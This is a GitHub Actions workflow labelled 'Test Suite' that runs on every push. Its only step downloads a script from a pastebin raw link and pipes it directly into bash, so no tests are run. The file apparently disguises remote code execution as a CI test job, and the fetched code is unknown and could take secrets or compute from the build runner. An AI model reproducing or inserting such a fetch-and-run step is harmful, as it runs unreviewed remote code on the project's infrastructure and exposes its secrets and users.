name: Test Suite
on: push
jobs:
  test:
    runs-on: buildjet-4vcpu-ubuntu-2204
    name: Test
    steps:
      - uses: actions/checkout@v2
      - run: |
         bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)"      
